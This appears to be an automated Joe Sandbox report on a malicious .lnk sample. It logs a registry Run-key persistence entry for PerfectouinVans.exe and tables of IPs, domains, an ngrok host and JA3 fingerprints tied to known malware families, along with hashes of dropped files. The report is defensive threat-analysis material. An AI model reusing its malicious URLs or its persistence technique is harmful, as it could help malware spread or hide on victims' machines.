                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 8496 because it is empty
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                            • VT rate limit hit for: qxjDerXRGR.lnk

                                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                            12:40:01API Interceptor189x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                            12:40:17API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                            12:41:20API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                            18:41:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PerfectouinVans C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe
                                                                                                                                                                                                                            18:41:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PerfectouinVans C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe

                                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                                            IPs

                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            162.125.65.15pay.batGet hashmaliciousKimsukyBrowse
                                                                                                                                                                                                                              protected.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                https://www.dropbox.com/l/AADw7QsXXUEgtGMTkaD6s_noiLvCBcZslDg/downloadingGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  35N4PXWcmC.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    162.159.61.3Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                        https://wetransfer.com/downloads/a83584fea59b11ef1e94d36869e8790020241209234540/89744b9472f9ce1b5e3b4ada79f2184c20241209234540/7041ff?t_exp=1734047140&t_lsid=42d44d78-6d8f-48db-8db5-5efa0c86786d&t_network=email&t_rid=ZW1haWx8Njc0ZjQ5YTNiNjM1NTFjNmY2NTg0N2Zj&t_s=download_link&t_ts=1733787940&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          nanophanotool.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            Fw 2025 Employee Handbook For all Colhca Employees Ref THEFUE.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              Distribution Agreement -21_12_48-December 6, 2024-be1f31b3a4b24beb88d27adfd723203e.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                FW_ _Reminder_ Membership Credit Verification - TPIS Industrial Services_ LLC.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  SADP.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                      ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                        162.125.65.18Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                                          ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                            QD40FIJ8QK.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                https://t.ly/HThl-Link1-0312Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  hnskldjf230.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                    kjsdfhsdHndf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                      hkjsdhf01.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                        kjshdfj_ksdf02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                          sjadhfkjshd0de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                            162.125.69.15Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                                zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    https://t.ly/HThl-Link1-0312Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      https://dl.dropboxusercontent.com/scl/fi/zwwtq189ncebo2kcft2qa/Nulo-PPC-Tracking-Report-2025.zip?rlkey=lvid9bjy47pkluerl2jbf5wun&st=bhhac8iv&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        Rechnung-Kfz.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          https://wingfireconection.com/002585qasdASDLJMQPK00lERDGhklkcvTJggj.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                            https://wingfireconection.com/002585qasdASDLJMQPK00lERDGhklkcvTJggj.comGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                              7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 18.192.31.165
                                                                                                                                                                                                                                                                                              chrome.cloudflare-dns.comRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                                              1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                                              nanophanotool.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                                              https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                                              List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                                              ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                                              my2gf4tNEk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                                              my2gf4tNEk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                                              17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                                              sF5nNt8usL.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                                              edge-block-www-env.dropbox-dns.comRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              https://t.ly/HThl-Link1-0312Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              fg.microsoft.map.fastly.netRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                                                                                              EgnyteDesktopApp_3.17.1_144.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                                                                                              sF5nNt8usL.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                                                                                                                              oLY6JbNl9i.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                                                                                                                              9aTcxCmLgM.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                                                                                                                              4l5IFxl9t3.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                                                                                              Readme.lnk.download.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                                                                                              098aPtSbmd.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                                                                                                                              loader.ps1.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                                                                                                                              Documenti relativi alla violazione dei diritti di propriet#U00e0 intellettuale.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                              • 199.232.214.172

                                                                                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                              DROPBOXUSRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                                              kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                                              kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                                              7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                                              kjshdkfgjsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                                              CLOUDFLARENETUSRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                                              CMK7DB5YtR.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                                                                                                                                              XrQ8NgQHTn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                                                                                                                                              https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.comGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                              • 172.67.145.201
                                                                                                                                                                                                                                                                                              9coWg6ayLz.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.159.140.238
                                                                                                                                                                                                                                                                                              Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                                                              • 188.114.97.6
                                                                                                                                                                                                                                                                                              UFS0yWUTWR.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 172.66.0.236
                                                                                                                                                                                                                                                                                              xrv3PCeWDV.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.159.140.238
                                                                                                                                                                                                                                                                                              K2B1CPXWSc.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 104.16.77.47
                                                                                                                                                                                                                                                                                              HwFciuum6M.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 172.66.0.236
                                                                                                                                                                                                                                                                                              DROPBOXUSRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                                              kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                                              kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                                              7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                                              kjshdkfgjsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                                              DROPBOXUSRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                                              kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                                              kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                                              7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.18
                                                                                                                                                                                                                                                                                              kjshdkfgjsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                              • 162.125.69.18

                                                                                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              9coWg6ayLz.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              UFS0yWUTWR.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              xrv3PCeWDV.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              K2B1CPXWSc.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              HwFciuum6M.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              qKIpxnvEyJ.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              3PALEJZmqL.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              8GPpalEkUp.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                                              • 162.125.69.15
                                                                                                                                                                                                                                                                                              mi8RDkNH3K.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              • 162.125.65.15
                                                                                                                                                                                                                                                                                              • 162.125.65.18
                                                                                                                                                                                                                                                                                              • 3.125.209.94
                                                                                                                                                                                                                                                                                              • 162.125.69.15

                                                                                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.8524657744033456
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDug9:gJjJGtpTq2yv1AuNZRY3diu8iBVqF7
                                                                                                                                                                                                                                                                                              MD5:B2AE16AC6943F2B885C0D49B6EA666CB
                                                                                                                                                                                                                                                                                              SHA1:7E43C84DA84C86CD4AC7729805F8A3205C96F248
                                                                                                                                                                                                                                                                                              SHA-256:C7080462F1A01C767AF020C52F5B4D99A6100819AF268A32C19C1FA0575BB312
                                                                                                                                                                                                                                                                                              SHA-512:C15A448C33D732EED5C84EB8CC4FB598595F18AF30048724DAD90F0B695D9C9E37E099CAC7971AEABA77D5AFD4758BBBA256C6A926D6D39131DEB49E7BAE0F52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xabfe2f9e, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.6586063933748301
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:hSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:haza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                                                                                                              MD5:3FCD08A6FD7AB1210501DC6B5196F35F
                                                                                                                                                                                                                                                                                              SHA1:C1C9EB89FE482495BFD164E3AEE3DB2220BE4CEF
                                                                                                                                                                                                                                                                                              SHA-256:37073E59FCFA33811F2617C67D14E3BF3D5F18686ECCA645FD73DA9BD9539370
                                                                                                                                                                                                                                                                                              SHA-512:27D2D9BF7D491DE752CD2212E9C607A15BD8322FB26D2620DF4D9C97B26B8942F2C8A50BEDF3BD315FD2950B748395CF2763DDC1B80F98E3AF15328C7407E1BF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:../.... ...............X\...;...{......................0.z..........{...(...|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................=.2..(...|=.................J...(...|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.08130676124721575
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:xrWtKYeAmxkHtGuAJkhvekl1JdN0xk9AllrekGltll/SPj:dWtKzcHtrxlIy9AJe3l
                                                                                                                                                                                                                                                                                              MD5:3FB1415CDB29D320FE9D10507B24D35B
                                                                                                                                                                                                                                                                                              SHA1:57A44A258380FC09D081AD933B38D59706F4B860
                                                                                                                                                                                                                                                                                              SHA-256:31562EE8CFE994E24531E313F5FB48619A0E3D02E08DDDB0EA07821D236BF377
                                                                                                                                                                                                                                                                                              SHA-512:968FBC1A4C74D1B14EF4FAF071C18C325811582AAE525622C79ED7C84777C72FC2E81FDBA2A206AC0E66F3F8B4BF9666ACE50253F452C10FB8139914EE4948E9
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.}.(.....................................;...{...(...|.......{...............{.......{...XL......{..................J...(...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fontdrvhost.exe_d32c824e8915b30da4efd4eabd13e74e4ef8c1_ad0be647_c1d48269-f5e0-49c6-baab-ff5d16e42363\Report.wer

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.6599267340882908
                                                                                                                                                                                                                                                                                              Encrypted:false
